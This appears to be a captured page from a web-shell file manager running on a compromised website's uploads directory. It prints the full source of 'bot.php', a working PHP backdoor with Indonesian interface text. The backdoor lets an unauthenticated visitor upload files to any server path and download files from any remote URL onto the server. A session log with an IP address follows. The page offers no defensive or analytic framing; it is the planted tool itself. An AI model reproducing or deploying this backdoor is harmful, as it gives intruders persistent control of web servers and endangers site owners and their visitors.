File Manager V1.5

[SYSTEM@ROOT]: /home/ketechno/public_html/QuickCheck/uploads/
INJECT_FILE:
NEW_ENTRY:

FILE_CONTENT: bot.php

<?php
if (isset($_GET['inc']) && $_GET['inc'] === 'upload') {
    echo '<form method="post" enctype="multipart/form-data">';
    echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">';
    echo '<input type="file" name="file" size="15">';
    echo '<input type="submit" value="Unggah">';
    echo '</form>';
}

if (isset($_FILES['file']['tmp_name'])) {
    $uploadd = $_FILES['file']['tmp_name'];
    if (file_exists($uploadd)) {
        $pwddir = $_POST['dir'];
        $real = $_FILES['file']['name'];
        $de = $pwddir . "/" . $real;
        copy($uploadd, $de);
        echo "BERKAS DIUNGGAHKAN KE $de";
    }
}
if (isset($_GET['inc']) && $_GET['inc'] === 'download') {
    echo '<form method="post">';
    echo '<input type="text" name="url" size="50" placeholder="Masukkan URL file...">';
    echo '<input type="text" name="dir" size="30" value="' . getcwd() . '">';
    echo '<input type="submit" name="download" value="Download">';
    echo '</form>';
}

if (isset($_POST['download'])) {
    $url = $_POST['url'];
    $saveDir = rtrim($_POST['dir'], '/');
    $fileName = basename(parse_url($url, PHP_URL_PATH));
    $savePath = $saveDir . '/' . $fileName;
    $fileContent = @file_get_contents($url);
    if ($fileContent === false) {
        echo "Gagal mendownload dari URL: $url";
    } else {
        file_put_contents($savePath, $fileContent);
        echo "File berhasil disimpan ke: $savePath";
    }
}
?>
[ KEMBALI ]
LOG_SESSION: 18:04:01 | ADDR: 216.73.216.167 | VERSION: 1.5_KNTL